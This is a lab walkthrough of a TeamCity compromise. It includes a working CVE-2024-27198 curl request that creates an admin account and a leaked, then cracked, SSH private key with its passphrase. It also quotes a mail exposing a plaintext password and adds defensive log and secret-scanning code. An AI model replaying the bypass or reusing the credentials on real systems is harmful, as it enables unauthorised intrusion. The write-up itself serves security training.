## Enumeration

### SMTP - 25 TCP

```
25/tcp open  smtp    Postfix smtpd
| ssl-cert: Subject: commonName=onlyrands.com
| Subject Alternative Name: DNS:onlyrands.com
| Issuer: commonName=onlyrands.com
| Public Key type: rsa
| Public Key bits: 2048
|_smtp-commands: onlyrands.com, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_ssl-date: TLS randomness does not represent time
```

Banner grabbing:

```
╭─[λ]-[/targets/scrutiny]-[192.168.226.91]
╰─> nc -vn $RHOST 25
(UNKNOWN) [192.168.226.91] 25 (smtp) open
220 onlyrands.com ESMTP Postfix (Ubuntu)
EHLO all
250-onlyrands.com
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING
```

NMAP SMTP enumeration:

```
╭─[λ]-[/targets/scrutiny]-[192.168.226.91]
╰─> nmap -p 25 --script="smtp*" $RHOST
PORT   STATE SERVICE
25/tcp open  smtp
| smtp-enum-users:
|_  root
| smtp-vuln-cve2010-4344:
|_  The SMTP server is not Exim: NOT VULNERABLE
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
|_smtp-commands: onlyrands.com, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
```

### WAPP - 80 HTTP

```
80/tcp  open   http  nginx 1.18.0 (Ubuntu)
|_http-title: OnlyRands
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD
443/tcp closed https
Service Info: Host: onlyrands.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

![[Pasted image 20250324185547.png]]

Site seems to be just a single static page?

```sh
╭─[λ]-[/targets/scrutiny]-[192.168.226.91]
╰─> ffuf -u http://$RHOST/FUZZ -c -w /arsenal/resources/raft-medium-words-lowercase.txt -mc 200,301,302
...
images                  [Status: 301, Size: 178, Words: 6, Lines: 8]
js                      [Status: 301, Size: 178, Words: 6, Lines: 8]
css                     [Status: 301, Size: 178, Words: 6, Lines: 8]
```

Seems to be a rather dead end... Nginx version does not seem to be vulnerable either...
![[Pasted image 20250324191133.png]]

Redirects to: http://teams.onlyrands.com/

Better go append that to `/etc/hosts`.

### teams.onlyrands.com - Teamcity

**Version:** `2023.05.4`

![[Pasted image 20250324191402.png]]

![[Pasted image 20250324191504.png]]

Although the RCE is for version `2023.05.3`, it's certainly worth trying anyway.

```
╭─[λ]-[/targets/scrutiny]-[192.168.226.91]
╰─> searchsploit -m 51884.py
  Exploit: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE)
      URL: https://www.exploit-db.com/exploits/51884
     Path: /opt/exploitdb/exploits/java/remote/51884.py
    Codes: CVE-2023-42793
 Verified: False
File Type: ASCII text, with very long lines (312)
Copied to: /targets/scrutiny/51884.py
```

> In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible

```python
data = {
    "username": username,
    "password": "Main_password!!**",
    "email": "[email protected]",
    "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}
}
```

The exploit doesn't work out (the advisory above names `2023.05.4` as the fixed version, which is exactly what the target runs)... Default credentials?

![[Pasted image 20250324192641.png]]

This one, [CVE-2024-27198](https://nvd.nist.gov/vuln/detail/cve-2024-27198), works.

- [PoC from Hack The Box](https://www.hackthebox.com/blog/cve-2024-27198-explained)

This request gets us in:

```sh
curl -s \
  -X POST 'http://teams.onlyrands.com/idontexist?jsp=/app/rest/users;.jsp' \
  -H "Content-Type: application/json" \
  --data '{"username": "g4rg4m3l", "password": "g4rg4m3l", "email": "g4rg4m3l", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}'
```

We can now authenticate using `g4rg4m3l:g4rg4m3l`.

### Initial Access

We can now upload plugins (RCE?).
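Detection angle, as an added example that is not part of the original write-up: a small scanner over nginx combined-format access log lines (constructed sample, assuming the TeamCity vhost is fronted by the nginx seen on port 80) that flags requests shaped like the one above, i.e. a `jsp` query parameter pointing at `/app/rest/` with the `;.jsp` suffix, and records whether the server answered 2xx, which is what tells you the bypass actually worked. The `bypass_target` and `scan_access_log` names are mine.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed nginx combined-format access log lines (not from the original
# page): line 2 mirrors the request used in the write-up, line 3 is the same
# trick URL-encoded and aimed at another REST endpoint, the rest is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Mar/2025:19:26:01 +0000] "GET /login.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Mar/2025:19:26:41 +0000] "POST /idontexist?jsp=/app/rest/users;.jsp HTTP/1.1" 200 830 "-" "curl/8.5.0"
10.0.0.9 - - [24/Mar/2025:19:27:02 +0000] "GET /hax?jsp=%2Fapp%2Frest%2Fserver%3B.jsp HTTP/1.1" 200 1201 "-" "curl/8.5.0"
10.0.0.5 - - [24/Mar/2025:19:27:30 +0000] "GET /app/rest/users HTTP/1.1" 401 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')

def bypass_target(uri: str):
    """Return the REST path smuggled through the 'jsp' parameter, or None.

    The CVE-2024-27198 bypass hides an /app/rest/ call behind a 'jsp' query
    parameter whose value ends in ';.jsp': the auth filter sees a JSP
    resource while TeamCity serves the REST endpoint.  Legitimate clients do
    not send 'jsp=' pointing at /app/rest/, so either sign is anomalous.
    """
    parts = urlsplit(uri)
    m = re.search(r'(?:^|&)jsp=([^&]*)', parts.query)
    if not m:
        return None
    target = unquote(m.group(1))            # decode %2F, %3B etc. first
    if target.startswith("/app/rest/") or target.endswith(";.jsp"):
        return target
    return None

def scan_access_log(text: str) -> list:
    """Flag bypass-shaped requests; a 2xx status means the bypass succeeded."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = bypass_target(m["uri"])
        if target:
            hits.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                         "target": target, "status": int(m["status"]),
                         "succeeded": m["status"].startswith("2")})
    return hits

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```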
![[Pasted image 20250330204607.png]]

Some additional browsing around reveals that a user `marcot` pushed his SSH private key: http://teams.onlyrands.com/change/2?personal=false&tab=files

![[Pasted image 20250330205300.png]]

```
-----BEGIN OPENSSH PRIVATE KEY-----
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
9EHV94yVIeYQzmagUFXqPqFVMSM=
-----END OPENSSH PRIVATE KEY-----
```

The `id_rsa` file is encrypted, so we go about cracking it with john:

```sh
╭─[λ]-[/targets/scrutiny]-[192.168.191.91]
╰─> ssh2john.py id_rsa > id_rsa.hash
╭─[λ]-[/targets/scrutiny]-[192.168.191.91]
╰─> john ./id_rsa.hash --wordlist=/arsenal/wordlists/rockyou.txt
```

And we get `cheer`. Let's change the passphrase to nothing:

```
╭─[λ]-[/targets/scrutiny]-[192.168.191.91]
╰─> ssh-keygen -p -f ./id_rsa -P cheer -N ""
```

```
╭─[λ]-[/targets/scrutiny]-[192.168.191.91]
╰─> ssh -i ./id_rsa [email protected]
```

## Privesc

Group and user enum:

```
marcot@onlyrands:~$ id
uid=1012(marcot) gid=1004(freelancers) groups=1004(freelancers)
```

`/etc/passwd` contains a TON of users....

```
marcot@onlyrands:~$ ls /home
administration  finance  freelancers  operations
```

Let's go check `mail`; we find a mail containing the following message:

```
marcot@onlyrands:/etc$ mail
Mail version 8.1.2 01/15/2001.  Type ? for help.
"/var/mail/marcot": 5 messages 5 new
>N  1 matthewa@onlyrand  Fri Jun  7 09:33  25/829   Goodbye, best friend
 N  2 matthewa@onlyrand  Fri Jun  7 09:33  30/1146  Goodbye!
 N  3 marcot@onlyrands.  Fri Jun  7 09:33  23/825   Welcome, new freelancer!
 N  4 edgarm@onlyrands.  Fri Jun  7 09:33  22/714   Congratulations
 N  5 sonjas@onlyrands.  Fri Jun  7 09:33  22/682   FIX YOUR NUMBERS
&
Message 1:
From [email protected]  Fri Jun  7 09:33:48 2024
X-Original-To: [email protected]
From: [email protected]
To: [email protected]
Subject: Goodbye, best friend
Date: Fri, 18 Feb 2022 08:43:11 (UTC)
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit

Marco,

Dach, the imbecile, forgot to disable my access, so you can login using my account. The password is "IdealismEngineAshen476" (without the quotation marcot). I've left you a parting gift--your eyes only.

I'm gonna miss you, pal. Catch you on the flip side.

Sincerely,
Matthew A.

&
```

## Lessons Learned

- Got stuck looking for the right CVE, took a hint, should have been more perseverant in my enumeration.
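Defender's follow-up to the committed key found on the TeamCity change page, as an added example that is not part of the original write-up: a pre-push style check that finds private-key blocks in committed text and, for the OpenSSH format, decodes only the `openssh-key-v1` header to read the cipher and KDF names. A key encrypted like the one above (`aes256-ctr` with the `bcrypt` KDF) is reported as "high" rather than "critical", because, as the `john` run shows, its protection is exactly the passphrase strength. `scan_text`, `inspect_openssh_key` and the `make_sample_key` fixture (constructed header bytes, no real key material) are mine.

```python
import base64
import re
import struct

# Matches any PEM-style private key block; the label backreference keeps
# BEGIN and END paired (e.g. "OPENSSH PRIVATE KEY", "RSA PRIVATE KEY").
PEM_RE = re.compile(
    r"-----BEGIN (?P<label>[A-Z ]*PRIVATE KEY)-----\s*(?P<body>.*?)-----END (?P=label)-----", re.S)

def _read_string(buf: bytes, off: int):
    """Read one length-prefixed string of the openssh-key-v1 wire format."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def inspect_openssh_key(body_b64: str) -> dict:
    """Read cipher and KDF names from the header: "none" means no passphrase."""
    raw = base64.b64decode("".join(body_b64.split()))
    magic = b"openssh-key-v1\x00"
    if not raw.startswith(magic):
        return {"cipher": "?", "kdf": "?", "severity": "critical"}
    cipher, off = _read_string(raw, len(magic))
    kdf, _ = _read_string(raw, off)
    # A passphrase-protected key is still a finding: its safety is only the
    # passphrase strength (the write-up cracked one from rockyou), so "high".
    return {"cipher": cipher.decode(), "kdf": kdf.decode(),
            "severity": "high" if cipher != b"none" else "critical"}

def scan_text(text: str) -> list:
    """Report every private key block in committed text (a diff, a file)."""
    findings = []
    for m in PEM_RE.finditer(text):
        label = m.group("label")
        info = (inspect_openssh_key(m.group("body")) if label == "OPENSSH PRIVATE KEY"
                else {"cipher": "?", "kdf": "?", "severity": "critical"})
        findings.append({"label": label, **info})
    return findings

def make_sample_key(cipher: bytes, kdf: bytes) -> str:
    """Constructed fixture (hypothetical): header fields only, no key material,
    which is all the inspector reads."""
    s = lambda b: struct.pack(">I", len(b)) + b          # ssh string encoder
    raw = b"openssh-key-v1\x00" + s(cipher) + s(kdf) + s(b"") + struct.pack(">I", 1)
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.encodebytes(raw).decode()
            + "-----END OPENSSH PRIVATE KEY-----\n")

# Constructed commit content: the first key is protected the same way as the
# one on the page (aes256-ctr, bcrypt KDF), the second has no passphrase.
SAMPLE_COMMIT = ("# deploy notes\n" + make_sample_key(b"aes256-ctr", b"bcrypt")
                 + "\n" + make_sample_key(b"none", b"none"))
```

Run it over `git diff --cached` output in a pre-commit hook; any finding at all should block the push, the severity only orders the clean-up.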